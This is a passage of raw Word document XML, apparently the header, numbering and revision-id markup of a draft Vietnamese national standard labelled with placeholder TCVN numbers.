        <w:lang w:eastAsia="en-US"/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251657728" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0FE03298" wp14:editId="648BACEE">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>22860</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>-226695</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="1386840" cy="338455"/>
              <wp:effectExtent l="3810" t="1905" r="0" b="2540"/>
              <wp:wrapNone/>
              <wp:docPr id="1" nam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338455"/>
                      </a:xfrm>
                      <a:prstGeom prst="roundRect">
                        <a:avLst>
                          <a:gd name="adj" fmla="val 16667"/>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CAD76F" w14:textId="77777777" w:rsidR="00204C5F" w:rsidRDefault="00204C5F">
                          <w:pPr>
                            <w:overflowPunct w:val="0"/>
                            <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
                            <w:jc w:val="left"/>
                            <w:rPr>
                              <w:rFonts w:eastAsia="Noto Sans CJK SC Regular"/>
                              <w:b/>
                              <w:bCs/>
                              <w:kern w:val="2"/>
                              <w:sz w:val="24"/>
                              <w:szCs w:val="24"/>
                              <w:lang w:bidi="hi-IN"/>
                            </w:rPr>
                          </w:pPr>
                          <w:r>
                            <w:rPr>
                              <w:rFonts w:eastAsia="Noto Sans CJK SC Regular"/>
                              <w:b/>
                              <w:bCs/>
                              <w:kern w:val="2"/>
                              <w:sz w:val="24"/>
                              <w:szCs w:val="24"/>
                              <w:lang w:bidi="hi-IN"/>
                            </w:rPr>
                            <w:t>TCVN XXXX-1:2019</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0FE03298" id="Shape1" o:spid="_x0000_s1032" style="position:absolute;margin-left:1.8pt;margin-top:-17.85pt;width:109.2pt;height:26.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" stroked="f" strokecolor="#3465a4">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w14:paraId="72CAD76F" w14:textId="77777777" w:rsidR="00204C5F" w:rsidRDefault="00204C5F">
                    <w:pPr>
                      <w:overflowPunct w:val="0"/>
                      <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:rFonts w:eastAsia="Noto Sans CJK SC Regular"/>
                        <w:b/>
                        <w:bCs/>
                        <w:kern w:val="2"/>
                        <w:sz w:val="24"/>
                        <w:szCs w:val="24"/>
                        <w:lang w:bidi="hi-IN"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:eastAsia="Noto Sans CJK SC Regular"/>
                        <w:b/>
                        <w:bCs/>
                        <w:kern w:val="2"/>
                        <w:sz w:val="24"/>
                        <w:szCs w:val="24"/>
                        <w:lang w:bidi="hi-IN"/>
                      </w:rPr>
                      <w:t>TCVN XXXX-1:2019</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
            </v:roundrect>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
  </w:p>
  <w:p w14:paraId="2A3F3E45" w14:textId="77777777" w:rsidR="00204C5F" w:rsidRDefault="00204C5F">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:spacing w:before="0" w:after="227"/>
      <w:ind w:right="170"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:r>
      <w:t>TCVN xxxx-1:2019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5FFE" w14:textId="77777777" w:rsidR="00204C5F" w:rsidRDefault="00204C5F">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4715" w14:textId="77777777" w:rsidR="00204C5F" w:rsidRDefault="00204C5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BC9AC" w14:textId="7C8F8A3D" w:rsidR="00204C5F" w:rsidRDefault="00204C5F" w:rsidP="002C6707">
    <w:pPr>
      <w:overflowPunct w:val="0"/>
      <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:eastAsia="Noto Sans CJK SC Regular" w:cs="Lohit Devanagari"/>
        <w:b/>
        <w:bCs/>
        <w:kern w:val="2"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:lang w:bidi="hi-IN"/>
      </w:rPr>
      <w:t>TCVN xxxx:2023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BA2C9" w14:textId="62A55F26" w:rsidR="00204C5F" w:rsidRDefault="00204C5F">
    <w:pPr>
      <w:overflowPunct w:val="0"/>
      <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:eastAsia="Noto Sans CJK SC Regular" w:cs="Lohit Devanagari"/>
        <w:b/>
        <w:bCs/>
        <w:kern w:val="2"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:lang w:bidi="hi-IN"/>
      </w:rPr>
      <w:t>TCVN xxxx:2023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5788" w14:textId="77777777" w:rsidR="00204C5F" w:rsidRPr="002C6707" w:rsidRDefault="00204C5F" w:rsidP="00073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7672A" w14:textId="77777777" w:rsidR="00204C5F" w:rsidRDefault="00204C5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6645F" w14:textId="77777777" w:rsidR="00204C5F" w:rsidRDefault="00204C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E0EB" w14:textId="77777777" w:rsidR="00204C5F" w:rsidRDefault="00204C5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0EDDE" w14:textId="77777777" w:rsidR="00204C5F" w:rsidRDefault="00204C5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72A58" w14:textId="77777777" w:rsidR="00204C5F" w:rsidRDefault="00204C5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4161" w14:textId="77777777" w:rsidR="00204C5F" w:rsidRDefault="00204C5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FC02" w14:textId="77777777" w:rsidR="00204C5F" w:rsidRDefault="00204C5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93058" w14:textId="78B23CFC" w:rsidR="00204C5F" w:rsidRPr="0069298D" w:rsidRDefault="00204C5F">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:spacing w:before="0" w:after="227"/>
      <w:ind w:right="170"/>
      <w:jc w:val="left"/>
      <w:rPr>
        <w:b/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="0069298D">
      <w:rPr>
        <w:b/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:t>TCVN 12</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:t>820</w:t>
    </w:r>
    <w:r w:rsidRPr="0069298D">
      <w:rPr>
        <w:b/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:t>:20</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>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99ACE12"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="none"/>
      <w:pStyle w:val="Heading1"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        <w:b/>
        <w:i/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="vi-VN"/>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Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        <w:b/>
        <w:i/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="vi-VN" w:eastAsia="zh-CN"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Cs w:val="22"/>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szCs w:val="22"/>
        <w:lang w:val="vi-VN"/>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Cs w:val="22"/>
        <w:lang w:val="vi-VN"/>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Cs w:val="22"/>
        <w:lang w:val="vi-VN"/>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szCs w:val="22"/>
        <w:lang w:val="vi-V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sz w:val="22"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="vi-VN"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val="vi-VN"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val="vi-VN"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2F22D40"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="458E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FA2802"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="12B03EB8"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="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B971E3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A0C2DD9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1A45124E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C78486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CC7D69"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E9AAE5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B965BD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4588F1E4"/>
    <w:lvl w:ilvl="0" w:tplc="E452E33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E3099"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3CCA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77E2E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6ED20E14"/>
    <w:lvl w:ilvl="0" w:tplc="08090001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="81D8BE1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63592"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ACA025E0"/>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B553D9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F50EA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5044E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9C3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FA3343"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A6EE6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8E1B57"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0C08D3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1020CC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C9B0F9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931C8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="12D24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9"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="32">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="33">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="34">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="35">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="36">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="37">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="38">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="39">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="40">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="4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5C"/>
    <w:rsid w:val="00000C02"/>
    <w:rsid w:val="0000573F"/>
    <w:rsid w:val="00006AB1"/>
    <w:rsid w:val="0001277C"/>
    <w:rsid w:val="000142E1"/>
    <w:rsid w:val="00014C9C"/>
    <w:rsid w:val="00015DB1"/>
    <w:rsid w:val="000238F5"/>
    <w:rsid w:val="000317E0"/>
    <w:rsid w:val="00036875"/>
    <w:rsid w:val="00041899"/>
    <w:rsid w:val="00050C22"/>
    <w:rsid w:val="00052B7E"/>
    <w:rsid w:val="00057A52"/>
    <w:rsid w:val="00060702"/>
    <w:rsid w:val="00060ED0"/>
    <w:rsid w:val="00061D44"/>
    <w:rsid w:val="00073133"/>
    <w:rsid w:val="000736B0"/>
    <w:rsid w:val="00073BF2"/>
    <w:rsid w:val="00087086"/>
    <w:rsid w:val="00095436"/>
    <w:rsid w:val="0009584B"/>
    <w:rsid w:val="00096DC7"/>
    <w:rsid w:val="00097649"/>
    <w:rsid w:val="000A129D"/>
    <w:rsid w:val="000A16B1"/>
    <w:rsid w:val="000B1CFB"/>
    <w:rsid w:val="000C274B"/>
    <w:rsid w:val="000C7D83"/>
    <w:rsid w:val="000D06CA"/>
    <w:rsid w:val="000D219D"/>
    <w:rsid w:val="000D5755"/>
    <w:rsid w:val="000F0350"/>
    <w:rsid w:val="000F1942"/>
    <w:rsid w:val="000F24EB"/>
    <w:rsid w:val="00103443"/>
    <w:rsid w:val="001052BF"/>
    <w:rsid w:val="001061D7"/>
    <w:rsid w:val="00112430"/>
    <w:rsid w:val="0011495A"/>
    <w:rsid w:val="0011544F"/>
    <w:rsid w:val="00116153"/>
    <w:rsid w:val="00117CB0"/>
    <w:rsid w:val="0012199C"/>
    <w:rsid w:val="00127700"/>
    <w:rsid w:val="001354A7"/>
    <w:rsid w:val="00137139"/>
    <w:rsid w:val="0013788A"/>
    <w:rsid w:val="00141160"/>
    <w:rsid w:val="00146166"/>
    <w:rsid w:val="00160352"/>
    <w:rsid w:val="001634A2"/>
    <w:rsid w:val="001715EB"/>
    <w:rsid w:val="00174A5E"/>
    <w:rsid w:val="001809C7"/>
    <w:rsid w:val="0018690B"/>
    <w:rsid w:val="00187EE9"/>
    <w:rsid w:val="001B0D27"/>
    <w:rsid w:val="001B4696"/>
    <w:rsid w:val="001C0707"/>
    <w:rsid w:val="001C4C16"/>
    <w:rsid w:val="001D1417"/>
    <w:rsid w:val="001D545D"/>
    <w:rsid w:val="001D7E76"/>
    <w:rsid w:val="001E0C1D"/>
    <w:rsid w:val="001E309C"/>
    <w:rsid w:val="001F4BDC"/>
    <w:rsid w:val="001F7EBC"/>
    <w:rsid w:val="00204C5F"/>
    <w:rsid w:val="002137FC"/>
    <w:rsid w:val="00217303"/>
    <w:rsid w:val="00225C69"/>
    <w:rsid w:val="00231112"/>
    <w:rsid w:val="002376CE"/>
    <w:rsid w:val="00245CE0"/>
    <w:rsid w:val="00251584"/>
    <w:rsid w:val="00253A9E"/>
    <w:rsid w:val="0025568F"/>
    <w:rsid w:val="00257F62"/>
    <w:rsid w:val="00261873"/>
    <w:rsid w:val="0026226C"/>
    <w:rsid w:val="002639AF"/>
    <w:rsid w:val="0028295F"/>
    <w:rsid w:val="00283638"/>
    <w:rsid w:val="00285288"/>
    <w:rsid w:val="0029647E"/>
    <w:rsid w:val="00297B6D"/>
    <w:rsid w:val="002A402D"/>
    <w:rsid w:val="002A5B4C"/>
    <w:rsid w:val="002B0FF1"/>
    <w:rsid w:val="002B16C4"/>
    <w:rsid w:val="002B57C8"/>
    <w:rsid w:val="002C0996"/>
    <w:rsid w:val="002C3010"/>
    <w:rsid w:val="002C4D0B"/>
    <w:rsid w:val="002C5FCC"/>
    <w:rsid w:val="002C6707"/>
    <w:rsid w:val="002D53D5"/>
    <w:rsid w:val="002D5412"/>
    <w:rsid w:val="002D622B"/>
    <w:rsid w:val="002E0AA6"/>
    <w:rsid w:val="002E2E94"/>
    <w:rsid w:val="002E59EC"/>
    <w:rsid w:val="002E5D91"/>
    <w:rsid w:val="002F0FBD"/>
    <w:rsid w:val="002F17ED"/>
    <w:rsid w:val="002F2FA7"/>
    <w:rsid w:val="002F383B"/>
    <w:rsid w:val="002F4FD5"/>
    <w:rsid w:val="0030011A"/>
    <w:rsid w:val="003025D3"/>
    <w:rsid w:val="003068A9"/>
    <w:rsid w:val="003141F2"/>
    <w:rsid w:val="00315A20"/>
    <w:rsid w:val="00317CE3"/>
    <w:rsid w:val="003332E5"/>
    <w:rsid w:val="0033488B"/>
    <w:rsid w:val="003379A5"/>
    <w:rsid w:val="003444FE"/>
    <w:rsid w:val="00344D73"/>
    <w:rsid w:val="0034518D"/>
    <w:rsid w:val="00347B5A"/>
    <w:rsid w:val="0035683F"/>
    <w:rsid w:val="00357907"/>
    <w:rsid w:val="003604ED"/>
    <w:rsid w:val="00362D13"/>
    <w:rsid w:val="003646A1"/>
    <w:rsid w:val="00367181"/>
    <w:rsid w:val="003758DF"/>
    <w:rsid w:val="0038045C"/>
    <w:rsid w:val="00392DF1"/>
    <w:rsid w:val="003A2B0C"/>
    <w:rsid w:val="003A4A3B"/>
    <w:rsid w:val="003A4F0E"/>
    <w:rsid w:val="003B081E"/>
    <w:rsid w:val="003B26B8"/>
    <w:rsid w:val="003B6572"/>
    <w:rsid w:val="003C1EC2"/>
    <w:rsid w:val="003D2757"/>
    <w:rsid w:val="003D27B3"/>
    <w:rsid w:val="003D2FD0"/>
    <w:rsid w:val="003D5D35"/>
    <w:rsid w:val="003D73F8"/>
    <w:rsid w:val="003E31C9"/>
    <w:rsid w:val="003E4A59"/>
    <w:rsid w:val="003F5A18"/>
    <w:rsid w:val="004043AD"/>
    <w:rsid w:val="00410D10"/>
    <w:rsid w:val="004160E5"/>
    <w:rsid w:val="00417327"/>
    <w:rsid w:val="004231E1"/>
    <w:rsid w:val="00425075"/>
    <w:rsid w:val="00441FCE"/>
    <w:rsid w:val="00443503"/>
    <w:rsid w:val="00443D1E"/>
    <w:rsid w:val="00444156"/>
    <w:rsid w:val="00444523"/>
    <w:rsid w:val="0045078F"/>
    <w:rsid w:val="004524F9"/>
    <w:rsid w:val="004565DB"/>
    <w:rsid w:val="00460272"/>
    <w:rsid w:val="004624D5"/>
    <w:rsid w:val="00475C38"/>
    <w:rsid w:val="004769FD"/>
    <w:rsid w:val="00487700"/>
    <w:rsid w:val="004922EA"/>
    <w:rsid w:val="00494E4D"/>
    <w:rsid w:val="00495EDE"/>
    <w:rsid w:val="004A1E6E"/>
    <w:rsid w:val="004B76F7"/>
    <w:rsid w:val="004C2856"/>
    <w:rsid w:val="004C6B70"/>
    <w:rsid w:val="004C7C5F"/>
    <w:rsid w:val="004D2172"/>
    <w:rsid w:val="004D34A7"/>
    <w:rsid w:val="004D36D4"/>
    <w:rsid w:val="004D4901"/>
    <w:rsid w:val="004D5A63"/>
    <w:rsid w:val="004D61FD"/>
    <w:rsid w:val="004E22EA"/>
    <w:rsid w:val="004E2A30"/>
    <w:rsid w:val="004E5EB8"/>
    <w:rsid w:val="004F05C3"/>
    <w:rsid w:val="004F1FEA"/>
    <w:rsid w:val="004F351A"/>
    <w:rsid w:val="004F3771"/>
    <w:rsid w:val="004F4C1E"/>
    <w:rsid w:val="004F701A"/>
    <w:rsid w:val="005132A1"/>
    <w:rsid w:val="00513B0C"/>
    <w:rsid w:val="00514255"/>
    <w:rsid w:val="005157CB"/>
    <w:rsid w:val="00524636"/>
    <w:rsid w:val="00524B0E"/>
    <w:rsid w:val="00525E9B"/>
    <w:rsid w:val="00535352"/>
    <w:rsid w:val="00535501"/>
    <w:rsid w:val="00536A94"/>
    <w:rsid w:val="00550F33"/>
    <w:rsid w:val="0055168D"/>
    <w:rsid w:val="00552BD6"/>
    <w:rsid w:val="00555DCE"/>
    <w:rsid w:val="0055772C"/>
    <w:rsid w:val="00560FD4"/>
    <w:rsid w:val="00561FC6"/>
    <w:rsid w:val="00563DD2"/>
    <w:rsid w:val="00567AE1"/>
    <w:rsid w:val="005805B9"/>
    <w:rsid w:val="00582A2F"/>
    <w:rsid w:val="00584EFA"/>
    <w:rsid w:val="005873FB"/>
    <w:rsid w:val="00595393"/>
    <w:rsid w:val="005A0D34"/>
    <w:rsid w:val="005A544E"/>
    <w:rsid w:val="005B12AE"/>
    <w:rsid w:val="005B53C1"/>
    <w:rsid w:val="005B6A03"/>
    <w:rsid w:val="005C7F3B"/>
    <w:rsid w:val="005D3441"/>
    <w:rsid w:val="005D4041"/>
    <w:rsid w:val="005E1045"/>
    <w:rsid w:val="005E5CE9"/>
    <w:rsid w:val="005E7205"/>
    <w:rsid w:val="005F4EC9"/>
    <w:rsid w:val="005F6366"/>
    <w:rsid w:val="006036BF"/>
    <w:rsid w:val="00603B6E"/>
    <w:rsid w:val="006040C8"/>
    <w:rsid w:val="006053CF"/>
    <w:rsid w:val="00607A7C"/>
    <w:rsid w:val="006165E4"/>
    <w:rsid w:val="0061685D"/>
    <w:rsid w:val="00620E1E"/>
    <w:rsid w:val="006228E6"/>
    <w:rsid w:val="00641436"/>
    <w:rsid w:val="00641FE8"/>
    <w:rsid w:val="0065038C"/>
    <w:rsid w:val="00652C86"/>
    <w:rsid w:val="00660B6C"/>
    <w:rsid w:val="006642F6"/>
    <w:rsid w:val="006779D8"/>
    <w:rsid w:val="00681F62"/>
    <w:rsid w:val="00683525"/>
    <w:rsid w:val="00683D8E"/>
    <w:rsid w:val="00687C28"/>
    <w:rsid w:val="00687C31"/>
    <w:rsid w:val="0069298D"/>
    <w:rsid w:val="00692C69"/>
    <w:rsid w:val="006A499A"/>
    <w:rsid w:val="006A4B5C"/>
    <w:rsid w:val="006A51D4"/>
    <w:rsid w:val="006A7585"/>
    <w:rsid w:val="006B1607"/>
    <w:rsid w:val="006B290E"/>
    <w:rsid w:val="006C2FE1"/>
    <w:rsid w:val="006D5C6B"/>
    <w:rsid w:val="006E426D"/>
    <w:rsid w:val="006F029D"/>
    <w:rsid w:val="006F1CBE"/>
    <w:rsid w:val="006F1D9D"/>
    <w:rsid w:val="006F6E47"/>
    <w:rsid w:val="007003B3"/>
    <w:rsid w:val="00701836"/>
    <w:rsid w:val="00710E68"/>
    <w:rsid w:val="00712E3F"/>
    <w:rsid w:val="00714426"/>
    <w:rsid w:val="00715386"/>
    <w:rsid w:val="007175F9"/>
    <w:rsid w:val="007200AC"/>
    <w:rsid w:val="007232C3"/>
    <w:rsid w:val="007262FE"/>
    <w:rsid w:val="007311BA"/>
    <w:rsid w:val="0073132D"/>
    <w:rsid w:val="00731D6F"/>
    <w:rsid w:val="00732DA9"/>
    <w:rsid w:val="00733C79"/>
    <w:rsid w:val="0073646D"/>
    <w:rsid w:val="007372E4"/>
    <w:rsid w:val="00741181"/>
    <w:rsid w:val="00746DDF"/>
    <w:rsid w:val="007612D9"/>
    <w:rsid w:val="00773433"/>
    <w:rsid w:val="007761D9"/>
    <w:rsid w:val="0077683D"/>
    <w:rsid w:val="00776986"/>
    <w:rsid w:val="007820CD"/>
    <w:rsid w:val="007A38A1"/>
    <w:rsid w:val="007A53E9"/>
    <w:rsid w:val="007B2024"/>
    <w:rsid w:val="007C27FA"/>
    <w:rsid w:val="007C4A04"/>
    <w:rsid w:val="007D32C1"/>
    <w:rsid w:val="007D4FDE"/>
    <w:rsid w:val="007D5BD5"/>
    <w:rsid w:val="007D7C72"/>
    <w:rsid w:val="007E4E2B"/>
    <w:rsid w:val="007F2B38"/>
    <w:rsid w:val="00801BD2"/>
    <w:rsid w:val="00805F33"/>
    <w:rsid w:val="0080736D"/>
    <w:rsid w:val="00810B32"/>
    <w:rsid w:val="0081394B"/>
    <w:rsid w:val="00822DEB"/>
    <w:rsid w:val="00843CDB"/>
    <w:rsid w:val="00846D0D"/>
    <w:rsid w:val="00847D85"/>
    <w:rsid w:val="00851C6A"/>
    <w:rsid w:val="00854C80"/>
    <w:rsid w:val="008604DD"/>
    <w:rsid w:val="00860A7D"/>
    <w:rsid w:val="0087489D"/>
    <w:rsid w:val="00883F34"/>
    <w:rsid w:val="00893DC3"/>
    <w:rsid w:val="00894438"/>
    <w:rsid w:val="008950B5"/>
    <w:rsid w:val="008A4EDE"/>
    <w:rsid w:val="008A5EDD"/>
    <w:rsid w:val="008B0249"/>
    <w:rsid w:val="008B4469"/>
    <w:rsid w:val="008B4992"/>
    <w:rsid w:val="008B5366"/>
    <w:rsid w:val="008C3780"/>
    <w:rsid w:val="008C3DA6"/>
    <w:rsid w:val="008C4544"/>
    <w:rsid w:val="008D0F45"/>
    <w:rsid w:val="008D70AF"/>
    <w:rsid w:val="008E2DB4"/>
    <w:rsid w:val="008F2DB8"/>
    <w:rsid w:val="008F3147"/>
    <w:rsid w:val="008F59B8"/>
    <w:rsid w:val="009005A0"/>
    <w:rsid w:val="00902727"/>
    <w:rsid w:val="00915BC0"/>
    <w:rsid w:val="00917759"/>
    <w:rsid w:val="00921392"/>
    <w:rsid w:val="009221D8"/>
    <w:rsid w:val="00925ED5"/>
    <w:rsid w:val="00933C91"/>
    <w:rsid w:val="0093417E"/>
    <w:rsid w:val="00936F43"/>
    <w:rsid w:val="00945485"/>
    <w:rsid w:val="00945A2D"/>
    <w:rsid w:val="00945C58"/>
    <w:rsid w:val="0095288B"/>
    <w:rsid w:val="00954FDD"/>
    <w:rsid w:val="00957B24"/>
    <w:rsid w:val="00967F4D"/>
    <w:rsid w:val="00981D9A"/>
    <w:rsid w:val="00983D6F"/>
    <w:rsid w:val="009868EE"/>
    <w:rsid w:val="0099049D"/>
    <w:rsid w:val="00991798"/>
    <w:rsid w:val="00997455"/>
    <w:rsid w:val="009A2BE4"/>
    <w:rsid w:val="009A7637"/>
    <w:rsid w:val="009B1DC5"/>
    <w:rsid w:val="009C5F19"/>
    <w:rsid w:val="009C7BA0"/>
    <w:rsid w:val="009D164E"/>
    <w:rsid w:val="009D4B2B"/>
    <w:rsid w:val="009D547B"/>
    <w:rsid w:val="009E0C0B"/>
    <w:rsid w:val="009E6407"/>
    <w:rsid w:val="009F0518"/>
    <w:rsid w:val="009F2296"/>
    <w:rsid w:val="009F55D3"/>
    <w:rsid w:val="009F6D8A"/>
    <w:rsid w:val="00A0065D"/>
    <w:rsid w:val="00A01452"/>
    <w:rsid w:val="00A02152"/>
    <w:rsid w:val="00A02C4F"/>
    <w:rsid w:val="00A12FF3"/>
    <w:rsid w:val="00A136DD"/>
    <w:rsid w:val="00A21426"/>
    <w:rsid w:val="00A335DD"/>
    <w:rsid w:val="00A35ACD"/>
    <w:rsid w:val="00A35DB0"/>
    <w:rsid w:val="00A3736F"/>
    <w:rsid w:val="00A41035"/>
    <w:rsid w:val="00A41498"/>
    <w:rsid w:val="00A41F3A"/>
    <w:rsid w:val="00A45DFF"/>
    <w:rsid w:val="00A521BD"/>
    <w:rsid w:val="00A5550E"/>
    <w:rsid w:val="00A72A03"/>
    <w:rsid w:val="00A752BA"/>
    <w:rsid w:val="00A75958"/>
    <w:rsid w:val="00A8265A"/>
    <w:rsid w:val="00A852F1"/>
    <w:rsid w:val="00A964D6"/>
    <w:rsid w:val="00AA38F3"/>
    <w:rsid w:val="00AA3CB4"/>
    <w:rsid w:val="00AA4F16"/>
    <w:rsid w:val="00AB7550"/>
    <w:rsid w:val="00AC23EA"/>
    <w:rsid w:val="00AD54B8"/>
    <w:rsid w:val="00AE2C5A"/>
    <w:rsid w:val="00AF5735"/>
    <w:rsid w:val="00AF6161"/>
    <w:rsid w:val="00AF7E9C"/>
    <w:rsid w:val="00B02D60"/>
    <w:rsid w:val="00B04630"/>
    <w:rsid w:val="00B06939"/>
    <w:rsid w:val="00B109FE"/>
    <w:rsid w:val="00B1283F"/>
    <w:rsid w:val="00B13C42"/>
    <w:rsid w:val="00B2298D"/>
    <w:rsid w:val="00B27886"/>
    <w:rsid w:val="00B40DE7"/>
    <w:rsid w:val="00B54086"/>
    <w:rsid w:val="00B606BE"/>
    <w:rsid w:val="00B62B0B"/>
    <w:rsid w:val="00B6531E"/>
    <w:rsid w:val="00B70B7B"/>
    <w:rsid w:val="00B70C43"/>
    <w:rsid w:val="00B75CA6"/>
    <w:rsid w:val="00B76FA7"/>
    <w:rsid w:val="00B77488"/>
    <w:rsid w:val="00B77B27"/>
    <w:rsid w:val="00B976F7"/>
    <w:rsid w:val="00BA222D"/>
    <w:rsid w:val="00BA2AF5"/>
    <w:rsid w:val="00BA339E"/>
    <w:rsid w:val="00BA6291"/>
    <w:rsid w:val="00BB0652"/>
    <w:rsid w:val="00BC2CE2"/>
    <w:rsid w:val="00BC2E3D"/>
    <w:rsid w:val="00BD0BB3"/>
    <w:rsid w:val="00BD2F41"/>
    <w:rsid w:val="00BE0113"/>
    <w:rsid w:val="00BE21A6"/>
    <w:rsid w:val="00BE5DB2"/>
    <w:rsid w:val="00BF112F"/>
    <w:rsid w:val="00C01E2D"/>
    <w:rsid w:val="00C1020A"/>
    <w:rsid w:val="00C12F2A"/>
    <w:rsid w:val="00C31082"/>
    <w:rsid w:val="00C35038"/>
    <w:rsid w:val="00C37A9C"/>
    <w:rsid w:val="00C42841"/>
    <w:rsid w:val="00C43D4F"/>
    <w:rsid w:val="00C4465B"/>
    <w:rsid w:val="00C46EAB"/>
    <w:rsid w:val="00C5215C"/>
    <w:rsid w:val="00C55B14"/>
    <w:rsid w:val="00C55F4C"/>
    <w:rsid w:val="00C56CD1"/>
    <w:rsid w:val="00C571EA"/>
    <w:rsid w:val="00C6573C"/>
    <w:rsid w:val="00C71E59"/>
    <w:rsid w:val="00C77645"/>
    <w:rsid w:val="00C84E79"/>
    <w:rsid w:val="00C85C59"/>
    <w:rsid w:val="00C904AA"/>
    <w:rsid w:val="00C91914"/>
    <w:rsid w:val="00C91B55"/>
    <w:rsid w:val="00C93A22"/>
    <w:rsid w:val="00C93C6D"/>
    <w:rsid w:val="00C97837"/>
    <w:rsid w:val="00CA0C2C"/>
    <w:rsid w:val="00CA3487"/>
    <w:rsid w:val="00CB4AF2"/>
    <w:rsid w:val="00CB7C84"/>
    <w:rsid w:val="00CC348C"/>
    <w:rsid w:val="00CC4483"/>
    <w:rsid w:val="00CC5F12"/>
